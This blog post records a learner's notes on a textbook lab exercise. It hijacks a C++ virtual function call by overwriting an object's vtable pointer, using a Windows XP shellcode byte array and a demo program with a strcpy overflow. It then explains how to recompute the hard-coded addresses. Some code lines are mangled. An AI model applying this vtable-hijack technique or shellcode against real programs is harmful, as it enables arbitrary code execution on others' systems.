文档章节

读0day攻击C++函数心得

余青木
 余青木
发布于 2014/01/05 23:42
字数 828
阅读 729
收藏 40

废话不说,直接上代码 原版代码:

#include "windows.h" #include "iostream.h" char shellcode[]= "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03" "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50" "\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"

 "\x1C\x88\x40\x00";

//set fake virtual function pointer

class Failwest 

{

 public: char buf[200]; 

virtual void test(void)

 { 

cout<<"Class Vtable::test()"<test();

 }

Failwest overflow, *p;

void main(void)

{

char * p_vtable;

p_vtable=overflow.buf-4;//point to virtual table

//__asm int 3

//reset fake virtual table to 0x004088cc

//the address may need to ajusted via runtime debug

p_vtable[0]=0xCC;

p_vtable[1]=0x88;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

strcpy(overflow.buf,shellcode);//set fake virtual function pointer

p=&overflow;

p->test();

}

这是failwest书里原版代码。其附带的exe,经实测,可以在xp,sp3下运行。

但是很奇怪的是,我把源代码一字不改的重新在上述环境里编译后,却不能正常运行,不知道为什么。

于是,想到要改写程序,以适应实际的环境。

用paintf("%x\n",overflow.buf);得到overflow.buf为0x40BAAC

于是将源代码改写为

        p_vtable[0]=0xAC - 4;

p_vtable[1]=0xBA;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

程序正常运行。
原因:将虚表指针p_vtable改写为0x40BAA8,则程序执行到p->test()时,将按照伪造的虚函数指针去0x40BAA8寻找虚表,而0x40BAA8地址值也为0x40BAA8,即为无效指令,对程序执行无影响。但是EIP+4,跳到了shellcode的起始地址处,开始执行了shellcode,于是程序正常运行。(见下图)


法二:

分析原代码可知:

p_vtable[0]=0xCC;

p_vtable[1]=0x88;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

执行后,
0x4088CC指向shellcode的末尾,在这里填上shellcode的起始位置0x0040881c作为伪造的虚函数入口地址,程序将最终去执行shellcode。

那么0x4088CC是怎么来的呢?

也就是shellcode首地址0x40881C + 176(0B0h) = 0x4088CC ,176为不加最后四字节"\x1C\x88\x40\x00"的shellcode的长度。

既然这样,那就好办了。

得到在我的系统里overflow.buf为0x40BAAC,那么加上0B0h,得0x40BB5C,即

p_vtable[0]=0x5c;

p_vtable[1]=0xbb;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

然后将shellcode最后的入口地址改为

"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"

"\xac\xba\x40\x00";//set fake virtual function pointer

即可。


虽然原理比较简单,但这次是我第一次正儿八经的写次博客,这么少的字,但是中途还是有让我不想写的念头。但觉得既然决定了,就好好的写下去,毕竟写技术博客只有好处,没有坏处。

以后会继续写下去,争取写得更通俗易懂。


© 著作权归作者所有

共有 人打赏支持
余青木
粉丝 2
博文 20
码字总数 6510
作品 0
拉萨
加载中

评论(3)

余青木
余青木

引用来自“Micooz”的评论

虚表地址固定的?

不是的
Micooz
Micooz
虚表地址固定的?
ericsoul
ericsoul
呃,没看懂。可能太难了。
linux下IO口模拟I2C的一些总结

以前一直在用I2C接口,因为总是有线程的例子就一直没有去深入的了解,今天分析了一下在linux下通用GPIO模拟I2C的程序。 I2C的驱动是用杂项设备实现的,这也是一种比较简单的实现方式。通过 ...

luuuk
2013/05/20
0
0
篮子、水果和鸡蛋——关于C++的模板偏特化和萃取编程技法

最近在读《STL源码剖析》。读这本书的时候发现自己的C++的知识其实是非常匮乏的。 从大学的C++教材上学到一些C++基本的语法、内存管理、继承、多态等方面的基础知识。这些只是是一棵大树的根...

costaxu
2012/12/22
0
0
深入探讨vc下C++模板编译模型

写过模板的朋友也许知道,一个模板程序,当编译器看到模板定义时并不立即产生代码,只有在我们用到模板,并对其实例化的时候,才会产生特定的实例。此时,编译器就要访问定义模板的源代码了。...

zjushawnelee88
2013/06/19
0
0
STL list链表的用法详解

------------------------------------------------------------------------------- 原来... STL list链表的用法详解 本文以List容器为例子,介绍了STL的基本内容,从容器到迭代器,再到普通...

nao
2014/04/10
0
0
Visual C++利用Intel C++ 编译器提升多核性能与多媒体指令支持获取更高的程序效率与缩小程序体积

Intel c++编译器有下列优点,建议VC++项目开发采用intel c++编译器取代VS自带c++编译器: 与 Microsoft Visual C++ 相兼容,可以嵌入 Microsoft Visual Studio 开发环境。 支持最新的多核处理...

junwong
2012/03/09
0
0

没有更多内容

加载失败,请刷新页面

加载更多

下一页

49.Nginx防盗链 访问控制 解析php相关 代理服务器

12.13 Nginx防盗链 12.14 Nginx访问控制 12.15 Nginx解析php相关配置(502的问题) 12.16 Nginx代理 扩展 502问题汇总 http://ask.apelearn.com/question/9109 location优先级 http://blog....

王鑫linux
54分钟前
0
0
Nginx防盗链、访问控制、解析php相关配置、Nginx代理

一、Nginx防盗链 1. 编辑虚拟主机配置文件 vim /usr/local/nginx/conf/vhost/test.com.conf 2. 在配置文件中添加如下的内容 { expires 7d; valid_referers none blocked server_names *.tes......

芬野de博客
今天
0
0
spring EL 和资源调用

资源调用 import org.springframework.beans.factory.annotation.Value;import org.springframework.context.annotation.PropertySource;import org.springframework.core.io.Resource;......

Canaan_
今天
1
0
memcached命令行、memcached数据导出和导入

一、memcached命令行 yum装telnet yum install telent 进入memcached telnet 127.0.0.1 11211 命令最后的2表示,两位字节,30表示过期时间(秒) 查看key1 get key1 删除:ctrl+删除键 二、m...

Zhouliang6
今天
0
0
Linux定时备份MySQL数据库

做项目有时候要备份数据库,手动备份太麻烦,所以找了一下定时备份数据库的方法 Linux里有一个 crontab 命令被用来提交和管理用户的需要周期性执行的任务,就像Windows里的定时任务一样,用这...

月夜中徘徊
今天
1
1

没有更多内容

加载失败,请刷新页面

加载更多

下一页

返回顶部
顶部